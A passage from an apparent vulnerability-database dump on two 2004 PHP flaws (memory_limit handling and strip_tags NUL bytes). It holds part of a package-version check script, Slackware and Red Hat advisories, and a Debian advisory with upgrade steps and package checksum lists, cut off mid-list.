prefix:\"php3-magick\", reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php3-mhash\", reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php3-mysql\", reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php3-snmp\", reference:\"3.0.18-23.1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"php3-xml\", reference:\"3.0.18-23.1woody2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "slackware": [{"lastseen": "2019-05-30T07:37:06", "bulletinFamily": "unix", "description": "New PHP packages are available for Slackware 8.1, 9.0, 9.1, 10.0, and -current\nto fix security issues (memory_limit handling and a problem in the strip_tags\nfunction). Sites using PHP should upgrade.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0594\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0595\n\n\nHere are the details from the Slackware 10.0 ChangeLog:\n\nTue Jul 20 19:35:16 PDT 2004\npatches/packages/php-4.3.8-i486-1.tgz: Upgraded to php-4.3.8.\n This release fixes two security problems in PHP (memory_limit handling and\n a problem in the strip_tags function). 
Sites using PHP should upgrade.\n For more details, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0594\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0595\n (* Security fix *)\n\nWhere to find the new packages:\n\nUpdated package for Slackware 8.1:\nftp://ftp.slackware.com/pub/slackware/slackware-8.1/patches/packages/php-4.3.8-i386-1.tgz\n\nUpdated package for Slackware 9.0:\nftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/php-4.3.8-i386-1.tgz\n\nUpdated package for Slackware 9.1:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/php-4.3.8-i486-1.tgz\n\nUpdated package for Slackware 10.0:\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/php-4.3.8-i486-1.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-4.3.8-i486-1.tgz\n\n\nMD5 signatures:\n\nSlackware 8.1 package:\nc6734463934818904828833b9e5dce59 php-4.3.8-i386-1.tgz\n\nSlackware 9.0 package:\n73055c5395f4c60b7cf4bbdcfab17e72 php-4.3.8-i386-1.tgz\n\nSlackware 9.1 package:\ne2d3374f55e85a14a15ac267193ac55e php-4.3.8-i486-1.tgz\n\nSlackware 10.0 package:\n7dfa5a85e080d833ea21fcd81b166977 php-4.3.8-i486-1.tgz\n\nSlackware -current package:\n7dfa5a85e080d833ea21fcd81b166977 php-4.3.8-i486-1.tgz\n\n\nInstallation instructions:\n\nFirst, stop apache:\n > apachectl stop\n\nNext, upgrade to the new PHP package:\n > upgradepkg php-4.3.8-i486-1.tgz\n\nFinally, restart apache:\n > apachectl start", "modified": "2004-07-20T23:21:16", "published": "2004-07-20T23:21:16", "id": "SSA-2004-202-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.406480", "title": "PHP", "type": "slackware", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:44:33", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP 
server.\n\nStefan Esser discovered a flaw when memory_limit configuration setting is\nenabled in versions of PHP 4 before 4.3.8. If a remote attacker could\nforce the PHP interpreter to allocate more memory than the memory_limit\nsetting before script execution begins, then the attacker may be\nable to supply the contents of a PHP hash table remotely. This hash table\ncould then be used to execute arbitrary code as the 'apache' user. The\nCommon Vulnerabilities and Exposures project (cve.mitre.org) has assigned\nthe name CAN-2004-0594 to this issue.\n\nThis issue may be exploitable if using the default PHP configuration with\nthe \"register_globals\" setting of \"On\". The Apache memory exhaustion bug,\nfixed in a previous update to Red Hat Enterprise Linux 3, may also allow\nthis PHP issue to be exploited; this Apache bug does not affect Red Hat\nEnterprise Linux 2.1.\n\nStefan Esser discovered a flaw in the strip_tags function in versions of\nPHP before 4.3.8. The strip_tags function is commonly used by PHP scripts\nto prevent Cross-Site-Scripting attacks by removing HTML tags from\nuser-supplied form data. By embedding NUL bytes into form data, HTML tags\ncan in some cases be passed intact through the strip_tags function, which\nmay allow a Cross-Site-Scripting attack. 
The Common Vulnerabilities and\nExposures project (cve.mitre.org) has assigned the name CAN-2004-0595 to\nthis issue.\n\nAll users of PHP are advised to upgrade to these updated packages, which\ncontain backported patches that address these issues.", "modified": "2018-03-14T19:25:52", "published": "2004-07-19T04:00:00", "id": "RHSA-2004:395", "href": "https://access.redhat.com/errata/RHSA-2004:395", "type": "redhat", "title": "(RHSA-2004:395) php security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:26", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP server.\n\nStefan Esser discovered a flaw when memory_limit is enabled in versions of\nPHP 4 before 4.3.8. If a remote attacker could force the PHP interpreter to\nallocate more memory than the memory_limit setting before script execution\nbegins, then the attacker may be able to supply the contents of a PHP hash\ntable remotely. This hash table could then be used to execute arbitrary\ncode as the 'apache' user. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CAN-2004-0594 to this issue.\n\nThis issue has a higher risk when PHP is running on an instance of Apache\nwhich is vulnerable to CAN-2004-0493. For Red Hat Enterprise Linux 3, this\nApache memory exhaustion issue was fixed by a previous update,\nRHSA-2004:342. It may also be possible to exploit this issue if using a\nnon-default PHP configuration with the \"register_defaults\" setting is\nchanged to \"On\". Red Hat does not believe that this flaw is exploitable in\nthe default configuration of Red Hat Enterprise Linux 3.\n\nStefan Esser discovered a flaw in the strip_tags function in versions of\nPHP before 4.3.8. The strip_tags function is commonly used by PHP scripts\nto prevent Cross-Site-Scripting attacks by removing HTML tags from\nuser-supplied form data. 
By embedding NUL bytes into form data, HTML tags\ncan in some cases be passed intact through the strip_tags function, which\nmay allow a Cross-Site-Scripting attack. The Common Vulnerabilities and\nExposures project (cve.mitre.org) has assigned the name CAN-2004-0595 to\nthis issue. \n\nAll users of PHP are advised to upgrade to these updated packages, which\ncontain backported patches that address these issues.", "modified": "2017-07-29T20:35:20", "published": "2004-07-19T04:00:00", "id": "RHSA-2004:392", "href": "https://access.redhat.com/errata/RHSA-2004:392", "type": "redhat", "title": "(RHSA-2004:392) php security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2019-08-22T02:23:52", "bulletinFamily": "unix", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 669-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nFebruary 7th, 2005 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : php3\nVulnerability : several\nProblem-Type : remote\nDebian-specific: no\nCVE IDs : CAN-2004-0594 CAN-2004-0595\n\nTwo vulnerabilities have been discovered in php4 which also apply to\nthe version of php3 in the stable Debian distribution. 
The Common\nVulnerabilities and Exposures project identifies the following\nproblems:\n\nCAN-2004-0594\n\n The memory_limit functionality allows remote attackers to execute\n arbitrary code under certain circumstances.\n\nCAN-2004-0595\n\n The strip_tags function does not filter null (\\0) characters\n within tag names when restricting input to allowed tags, which\n allows dangerous tags to be processed by some web browsers which\n could lead to cross-site scripting (XSS) vulnerabilities.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 3.0.18-23.1woody2.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 3.0.18-27.\n\nWe recommend that you upgrade your php3 packages.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n
http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mysql_3.0.18-23.1woody2_arm.deb\n Size/MD5 checksum: 13554 9e69503375735d617e14014c57b58b9c\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-snmp_3.0.18-23.1woody2_arm.deb\n Size/MD5 checksum: 5422 dba7181217ebc1e712c2bedbcc5687e4\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-xml_3.0.18-23.1woody2_arm.deb\n Size/MD5 checksum: 11002 058d6185fe4e88910370b4274dc0648a\n http://security.debian.org/pool/updates/main/p/php3/php3-dev_3.0.18-23.1woody2_arm.deb\n Size/MD5 checksum: 51080 fd17081cf67051fcc058a8868edad2ab\n http://security.debian.org/pool/updates/main/p/php3/php3-gd_3.0.18-23.1woody2_arm.deb\n Size/MD5 checksum: 20344 7e3d5fcff6070c2bc4645365a0053c11\n http://security.debian.org/pool/updates/main/p/php3/php3-imap_3.0.18-23.1woody2_arm.deb\n Size/MD5 checksum: 25702 c9ca45ea2fc8e40b3a206a0a5cb3556e\n http://security.debian.org/pool/updates/main/p/php3/php3-ldap_3.0.18-23.1woody2_arm.deb\n Size/MD5 checksum: 9066 19ef2d64010083b4d193a77481e59ef4\n http://security.debian.org/pool/updates/main/p/php3/php3-magick_3.0.18-23.1woody2_arm.deb\n Size/MD5 checksum: 7624 1e0655e71afc169e7f09fe7b37d7c145\n http://security.debian.org/pool/updates/main/p/php3/php3-mhash_3.0.18-23.1woody2_arm.deb\n Size/MD5 checksum: 3642 e427adb5f2b3254bb9210aa4cf482fb6\n http://security.debian.org/pool/updates/main/p/php3/php3-mysql_3.0.18-23.1woody2_arm.deb\n Size/MD5 checksum: 12888 d13deb3e8952362d96d682db2a911b35\n http://security.debian.org/pool/updates/main/p/php3/php3-snmp_3.0.18-23.1woody2_arm.deb\n Size/MD5 checksum: 5602 7ef7c3ba993dc53531df006a7ffbfacb\n http://security.debian.org/pool/updates/main/p/php3/php3-xml_3.0.18-23.1woody2_arm.deb\n Size/MD5 checksum: 10584 255aadd14a2f1467f7dc9abb34deecb0\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 362082 6787eeac8e9ac2e50e20bb801abe9253\n 
http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 461994 8bb9fa9c56ccdbb7d48eb4638829390b\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-gd_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 21108 944e87973aaffb473b051e18ca8eab0c\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-imap_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 24126 8e51b94efbda2899d713f47e58dfda02\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-ldap_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 9544 3234c38fe99650840159f6814b70a5db\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-magick_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 6454 0a9234881aa6666c496f66c6a09f4257\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mhash_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 3824 5abf21161298ae868fd1a6201fe78874\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mysql_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 12894 72a89986a4a12997372b1d364c0d574a\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-snmp_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 5450 e87b64486722d602d071dbee4b217556\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-xml_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 10840 a6b2633e6c626ee25d179f56da58825c\n http://security.debian.org/pool/updates/main/p/php3/php3-dev_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 57762 29559e1ebf88f9ee1fc8b76d200cf205\n http://security.debian.org/pool/updates/main/p/php3/php3-gd_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 20630 f727e144c936a6d34efcfc0a0ab8eee4\n http://security.debian.org/pool/updates/main/p/php3/php3-imap_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 24026 2fc6d0fc417e3c3dacabff889844d7aa\n http://security.debian.org/pool/updates/main/p/php3/php3-ldap_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 9408 bc84679bc33f1c77bd5f9c6c2e583712\n 
http://security.debian.org/pool/updates/main/p/php3/php3-magick_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 6346 37f8ef9c2d19723b5be934abc4562555\n http://security.debian.org/pool/updates/main/p/php3/php3-mhash_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 3746 9d119dea1307e02a5b0afea239142f75\n http://security.debian.org/pool/updates/main/p/php3/php3-mysql_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 12720 a26a1916a4be814b145bed6d7941afb0\n http://security.debian.org/pool/updates/main/p/php3/php3-snmp_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 5344 d2bf02ace4ca2b52778e91749a055380\n http://security.debian.org/pool/updates/main/p/php3/php3-xml_3.0.18-23.1woody2_i386.deb\n Size/MD5 checksum: 10402 aa166d59f051adc53caffeb18793eb54\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 485120 b914af6b835bb16c0d9a9fe810b30e5a\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 753444 a08fc22b4b5674795cd003aa774d5e3b\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-gd_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 38204 db03d15559ca62f4f9ae95467c72f174\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-imap_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 43172 8e6d8007e78bbbcbe6b9d047bb33145f\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-ldap_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 15644 fc1fa99906828af89ed744daf5d011a0\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-magick_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 10192 f72e7a8ce4e9600fd62294449fed83b5\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mhash_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 5320 9ffe8ab166385be9ea7ccd0c94d5a387\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mysql_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 21430 
b5356cf24235b3baf94fd89eccb75e3e\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-snmp_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 7828 84979e0eadcf73ff800caed3b0cced45\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-xml_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 18766 d2c8077fdb79619c7af8835d959890b8\n http://security.debian.org/pool/updates/main/p/php3/php3-dev_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 51092 d079eb7c8e580db5429ca54eec143a5c\n http://security.debian.org/pool/updates/main/p/php3/php3-gd_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 32824 365f80dcc939b945f3d6ba7d5d37a5cf\n http://security.debian.org/pool/updates/main/p/php3/php3-imap_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 35288 f9bf561c764189ab2cfa968cde1db886\n http://security.debian.org/pool/updates/main/p/php3/php3-ldap_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 13342 bfaef446d2b5878845b2599c3f7d2550\n http://security.debian.org/pool/updates/main/p/php3/php3-magick_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 9082 b139ef11d941c230af7325b424c10b5d\n http://security.debian.org/pool/updates/main/p/php3/php3-mhash_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 4788 565354fff0fa172025a204638a01734f\n http://security.debian.org/pool/updates/main/p/php3/php3-mysql_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 18824 db0055024384ddbafd6dfa2f67e8e9ad\n http://security.debian.org/pool/updates/main/p/php3/php3-snmp_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 7084 5947c5ffa7e56b11135a42fcc8bfb184\n http://security.debian.org/pool/updates/main/p/php3/php3-xml_3.0.18-23.1woody2_ia64.deb\n Size/MD5 checksum: 15928 936b88b0d8fb00c89a1b0eacadb23675\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 404544 b25239855c8fb96fb7019f1a126a3268\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 567692 
94f94e2f5d8eff7c9969a4ff7aaf695c\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-gd_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 22986 c4ba449a797cc9d281a98829bdcf3c32\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-imap_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 26800 9a6f3aa33e45a02ec7d2bfe9bfb98974\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-ldap_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 10464 d54ff9acd08f3a3eff97a200489e57cf\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-magick_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 8468 155a39ec41356c590cc2e1c3742ba1e6\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mhash_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 4198 511263c7b823d628f189cb923d35febc\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mysql_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 14270 5dab735bdb79588c57c408263aa4d3ce\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-snmp_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 5768 18add6a8a4bdc8dfea49b4ba174f345f\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-xml_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 12026 e911a78f07ab709997eade5312891d84\n http://security.debian.org/pool/updates/main/p/php3/php3-dev_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 51096 f56a4597ec6261c5ab47cfb9b145193f\n http://security.debian.org/pool/updates/main/p/php3/php3-gd_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 25206 af7957881c498351ebdbabda36bb25a9\n http://security.debian.org/pool/updates/main/p/php3/php3-imap_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 28886 a6fbf83904468631b34bccbe75ac150a\n http://security.debian.org/pool/updates/main/p/php3/php3-ldap_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 11224 69627af6dcb77c1c508f1068b9508814\n http://security.debian.org/pool/updates/main/p/php3/php3-magick_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 8778 
7f0a61bd7a3cdbb42aabbae13ed7f82e\n http://security.debian.org/pool/updates/main/p/php3/php3-mhash_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 4224 6a0fdfc4fdfc8657af24cf9c38d3c0ae\n http://security.debian.org/pool/updates/main/p/php3/php3-mysql_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 14892 b2b22d3b8f15e26765e3718bdd0f8c2c\n http://security.debian.org/pool/updates/main/p/php3/php3-snmp_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 5858 57d7dae8b607e3b9eefdabf80ed6300d\n http://security.debian.org/pool/updates/main/p/php3/php3-xml_3.0.18-23.1woody2_hppa.deb\n Size/MD5 checksum: 12832 0ff973288f884888af76b3047c4b58db\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-23.1woody2_m68k.deb\n Size/MD5 checksum: 357480 a974723dec64d38d8ab919dc10fd139c\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-23.1woody2_m68k.deb\n Size/MD5 checksum: 432828 c1403347a82ddc22f92f2868ab6be90c\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-gd_3.0.18-23.1woody2_m68k.deb\n Size/MD5 checksum: 21404 8866c6f7ce61f193c9731422a608eb99\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-imap_3.0.18-23.1woody2_m68k.deb\n Size/MD5 checksum: 25254 6aed3ecf78a5a2c902ef4a2e53826e44\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-ldap_3.0.18-23.1woody2_m68k.deb\n Size/MD5 checksum: 9528 fd95b5ce11a6a64310118d11e0240888\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-magick_3.0.18-23.1woody2_m68k.deb\n Size/MD5 checksum: 6686 58ee57694fb0c134eb8476fd964295c5\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mhash_3.0.18-23.1woody2_m68k.deb\n Size/MD5 checksum: 3858 4df46c8427e27ecd71acb1be25a07972\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mysql_3.0.18-23.1woody2_m68k.deb\n Size/MD5 checksum: 13334 b893f8cc781c046e758bb25d3f816783\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-snmp_3.0.18-23.1woody2_m68k.deb\n 
Size/MD5 checksum: 5460 1f2d266ba865af34d2fee5b38087f87f\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-xml_3.0.18-23.1woody2_m68k.deb\n Size/MD5 checksum: 11110 862848858a05fc7587a22c17dd35d0ae\n http://security.debian.org/pool/updates/main/p/php3/php3-dev_3.0.18-23.1woody2_m68k.deb\n Size/MD5 checksum: 51108 8b7a81cd09893562e4f8c917e4a668c6\n http://security.debian.org/pool/updates/main/p/php3/php3-gd_3.0.18-23.1woody2_m68k.deb\n Size/MD5 checksum: 20186 850fef527ae16661d8b13ad94b3f52d4\n http://security.debian.org/pool/updates/main/p/php3/php3-imap_3.0.18-23.1woody2_m68k.deb\n Size/MD5 checksum: 24812 5ad704e699f7dc3020a806e393551d67\n http://security.debian.org/pool/updates/main/p/php3/php3-ldap_3.0.18-23.1woody2_m68k.deb\n Size/MD5 checksum: 9084 48bb1d2671be9eba5b82dbf4b20f78ad\n http://security.debian.org/pool/updates/main/p/php3/php3-magick_3.0.18-23.1woody2_m68k.deb\n Size/MD5 checksum: 6484 e256ccd9284ae021badd122074b74b1d\n http://security.debian.org/pool/updates/main/p/php3/php3-mhash_3.0.18-23.1woody2_m68k.deb\n Size/MD5 checksum: 3780 b6ebddbda4b82ac9b2ece422713299b3\n http://security.debian.org/pool/updates/main/p/php3/php3-mysql_3.0.18-23.1woody2_m68k.deb\n Size/MD5 checksum: 12556 974d98e304b7f1245aa8a1ae63bac5ff\n http://security.debian.org/pool/updates/main/p/php3/php3-snmp_3.0.18-23.1woody2_m68k.deb\n Size/MD5 checksum: 5246 d9cfed19e2b39a9ea16b62bdf6c9bfc0\n http://security.debian.org/pool/updates/main/p/php3/php3-xml_3.0.18-23.1woody2_m68k.deb\n Size/MD5 checksum: 10546 8e5984a3f9867690df76a718eae2903f\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-23.1woody2_mips.deb\n Size/MD5 checksum: 363618 91be56bffc4fd8d6d807135ef5609ea4\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-23.1woody2_mips.deb\n Size/MD5 checksum: 509668 9a4fb8ea53ac7dde071cf4d1457a5b9d\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-gd_3.0.18-23.1woody2_mips.deb\n 
Size/MD5 checksum: 21332 d8c264de614f57d7ae9184ff3d802101\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-imap_3.0.18-23.1woody2_mips.deb\n Size/MD5 checksum: 22680 6b35b1879c6dd1b6304d109bc27a1ba7\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-ldap_3.0.18-23.1woody2_mips.deb\n Size/MD5 checksum: 9842 c0197910ef31c5bcb1513b18cc2eeaa6\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-magick_3.0.18-23.1woody2_mips.deb\n Size/MD5 checksum: 7418 cc7311e6eaadf6ef9a327a4184cc5c65\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mhash_3.0.18-23.1woody2_mips.deb\n Size/MD5 checksum: 4100 a87de9fbdd2d8a40580243a79a112bf7\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mysql_3.0.18-23.1woody2_mips.deb\n Size/MD5 checksum: 12254 0105967655177cca0b95cdc90d1f594a\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-snmp_3.0.18-23.1woody2_mips.deb\n Size/MD5 checksum: 5588 a5f7cbee2c5dea79873a0958f26a480a\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-xml_3.0.18-23.1woody2_mips.deb\n Size/MD5 checksum: 11050 7553dd819910bbeb901cb1e770263f23\n http://security.debian.org/pool/updates/main/p/php3/php3-dev_3.0.18-23.1woody2_mips.deb\n Size/MD5 checksum: 51110 4009b6e4a31cf1cee28cae63f5948709\n http://security.debian.org/pool/updates/main/p/php3/php3-gd_3.0.18-23.1woody2_mips.deb\n Size/MD5 checksum: 21748 1ac3abf0bbf304e9af52c30be3b94633\n http://security.debian.org/pool/updates/main/p/php3/php3-imap_3.0.18-23.1woody2_mips.deb\n Size/MD5 checksum: 22472 27cf8e057093945b35c4775f23b7baaa\n http://security.debian.org/pool/updates/main/p/php3/php3-ldap_3.0.18-23.1woody2_mips.deb\n Size/MD5 checksum: 9688 9d9a15ea3e6df1e8be1be9447c1d7e65\n http://security.debian.org/pool/updates/main/p/php3/php3-magick_3.0.18-23.1woody2_mips.deb\n Size/MD5 checksum: 7294 86ae4c97b6c0f7b0a25d63bac31c2680\n http://security.debian.org/pool/updates/main/p/php3/php3-mhash_3.0.18-23.1woody2_mips.deb\n Size/MD5 
checksum: 3908 96c5a39af1d6691564309ecca06b1e87\n http://security.debian.org/pool/updates/main/p/php3/php3-mysql_3.0.18-23.1woody2_mips.deb\n Size/MD5 checksum: 12618 9d0acec4be6bb1e31b7ce7e48402a208\n http://security.debian.org/pool/updates/main/p/php3/php3-snmp_3.0.18-23.1woody2_mips.deb\n Size/MD5 checksum: 5392 d47d9cacd3951fbca1887f793f862cd8\n http://security.debian.org/pool/updates/main/p/php3/php3-xml_3.0.18-23.1woody2_mips.deb\n Size/MD5 checksum: 10898 318baf04ee6ad995648bebfee5fbf562\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 362494 87d0da94045062c93b98b748ca3fbe67\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 508018 a881e4973666aaa8c16d7472b2e936d3\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-gd_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 21140 fbed3f69a6b6fd780280fe41da00100b\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-imap_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 22590 3b0e26f2c94eefd522ab69114a551f0e\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-ldap_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 9802 6ed6a25a43cfb40d21335786ddc2d3c6\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-magick_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 7438 0a2e239eed8f6b0ec86489f02a685a96\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mhash_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 4072 0cdf5490573dc2f66a5f9a8949af660b\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mysql_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 12246 e00809f94735652781c574e67d5ffce0\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-snmp_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 5576 6fa8cbb3d3ad6ccd06af6a69573c6248\n 
